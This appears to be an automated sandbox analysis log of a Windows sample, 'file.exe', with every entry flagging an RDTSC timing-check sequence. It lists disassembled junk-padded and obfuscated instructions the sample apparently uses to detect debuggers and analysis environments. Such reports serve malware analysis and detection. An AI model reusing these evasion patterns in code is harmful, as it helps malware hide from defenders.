                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276475 second address: 276495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD313h 0x00000007 jnp 00007F05ECFAD306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276495 second address: 27649D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276B77 second address: 276B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276B7F second address: 276BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F05ECE231B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007F05ECE231B6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c jng 00007F05ECE231B6h 0x00000022 pop esi 0x00000023 popad 0x00000024 pushad 0x00000025 js 00007F05ECE231C2h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276BAC second address: 276BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276BB2 second address: 276BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F05ECE231B6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jns 00007F05ECE231B6h 0x00000013 jmp 00007F05ECE231C6h 0x00000018 popad 0x00000019 pushad 0x0000001a js 00007F05ECE231B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276BE5 second address: 276BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276D6F second address: 276D8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05ECE231C3h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2771B8 second address: 2771C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2771C7 second address: 2771E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F05ECE231C4h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2774A0 second address: 2774A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2774A5 second address: 2774AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277603 second address: 277649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F05ECFAD306h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F05ECFAD316h 0x00000014 ja 00007F05ECFAD306h 0x0000001a popad 0x0000001b pop esi 0x0000001c pushad 0x0000001d jmp 00007F05ECFAD313h 0x00000022 pushad 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277649 second address: 277676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F05ECE231B6h 0x0000000a popad 0x0000000b jg 00007F05ECE231B8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F05ECE231C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277676 second address: 27767A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C01C second address: 27C022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C022 second address: 27C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F05ECFAD30Dh 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C036 second address: 27C053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C053 second address: 27C057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C057 second address: 27C065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C065 second address: 27C06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C06D second address: 27C075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C1E0 second address: 27C1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C4B9 second address: 27C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECE231C8h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C4D5 second address: 27C4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C626 second address: 27C63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F05ECE231B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jg 00007F05ECE231BEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C958 second address: 27C96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05ECFAD306h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C96C second address: 27C972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A283 second address: 22A2B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F05ECFAD313h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A2B2 second address: 22A2C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A2C0 second address: 22A2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A2C6 second address: 22A2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D01A second address: 27D027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D027 second address: 27D02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D02B second address: 27D043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F05ECFAD306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F05ECFAD30Ch 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B947 second address: 27B951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B951 second address: 27B979 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F05ECFAD312h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jne 00007F05ECFAD306h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B979 second address: 27B987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 280272 second address: 28027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F05ECFAD306h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28027E second address: 28028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FE9CD second address: 1FE9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FE9D1 second address: 1FE9F2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F05ECE231BAh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F05ECE231BAh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FE9F2 second address: 1FEA17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F05ECFAD30Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECFAD30Eh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FEA17 second address: 1FEA1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E883 second address: 24E889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E889 second address: 24E893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05ECE231B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E893 second address: 24E8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F05ECFAD30Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24ED97 second address: 24ED9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24EF2A second address: 24EF36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24EF36 second address: 24EF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F05ECE231B6h 0x0000000a popad 0x0000000b je 00007F05ECE231BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24EFD6 second address: 24EFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F09A second address: 24F0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F0BC second address: 24F0EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007F05ECFAD315h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F05ECFAD30Ch 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F17B second address: 24F17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F2E4 second address: 24F2EE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05ECFAD30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F2EE second address: 24F35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F05ECE231BEh 0x0000000c nop 0x0000000d jmp 00007F05ECE231C3h 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F05ECE231B8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F05ECE231C4h 0x00000037 jbe 00007F05ECE231B6h 0x0000003d popad 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F35A second address: 24F360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F360 second address: 24F364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24FAA4 second address: 24FAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24FB1D second address: 24FBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f adc ecx, 5BC3BA4Bh 0x00000015 lea eax, dword ptr [ebp+124933F3h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+12456BECh], ecx 0x00000022 mov edx, dword ptr [ebp+122D280Dh] 0x00000028 popad 0x00000029 sub ecx, dword ptr [ebp+122D3775h] 0x0000002f push eax 0x00000030 jmp 00007F05ECE231C6h 0x00000035 mov dword ptr [esp], eax 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F05ECE231B8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, 08CDF534h 0x00000057 lea eax, dword ptr [ebp+124933AFh] 0x0000005d mov edx, 79B19866h 0x00000062 jne 00007F05ECE231CEh 0x00000068 push eax 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jno 00007F05ECE231B6h 0x00000072 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24FBBA second address: 22A283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F05ECFAD30Fh 0x0000000f mov di, 8D87h 0x00000013 pop edi 0x00000014 call dword ptr [ebp+122D3191h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F05ECFAD319h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28481E second address: 284822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284F5F second address: 284F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2850EB second address: 285110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F05ECE231B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F05ECE231C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285110 second address: 285116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285116 second address: 285140 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05ECE231B6h 0x00000008 jnc 00007F05ECE231B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 jl 00007F05ECE231B6h 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c js 00007F05ECE231C2h 0x00000022 jg 00007F05ECE231B6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285140 second address: 285152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F05ECFAD30Ah 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE90 second address: 28AEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECE231C3h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AEA7 second address: 28AEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0163 second address: 49E0167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0167 second address: 49E0176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0176 second address: 49E017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E017C second address: 49E0181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0181 second address: 49E01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECFAD312h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F05ECFAD30Eh 0x00000016 xor cx, 4A18h 0x0000001b jmp 00007F05ECFAD30Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov cl, 56h 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E01C2 second address: 49E0203 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F05ECE231BBh 0x00000008 sbb cx, 3EDEh 0x0000000d jmp 00007F05ECE231C9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F05ECE231BDh 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0E5F second address: 49C0E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0E63 second address: 49C0E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0E69 second address: 49C0EB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F05ECFAD30Ch 0x0000000b adc si, 72B8h 0x00000010 jmp 00007F05ECFAD30Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F05ECFAD30Eh 0x00000025 add ax, AD18h 0x0000002a jmp 00007F05ECFAD30Bh 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0EB5 second address: 49C0EC9 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edi 0x0000000f mov si, 37BFh 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0EC9 second address: 49C0F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD315h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F05ECFAD313h 0x00000013 adc eax, 4B1373EEh 0x00000019 jmp 00007F05ECFAD319h 0x0000001e popfd 0x0000001f mov eax, 30B71B77h 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0F20 second address: 49C0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10024 second address: 4A1007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F05ECFAD30Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F05ECFAD310h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 jmp 00007F05ECFAD30Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F05ECFAD310h 0x00000024 sbb ch, 00000068h 0x00000027 jmp 00007F05ECFAD30Bh 0x0000002c popfd 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0098 second address: 49A009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
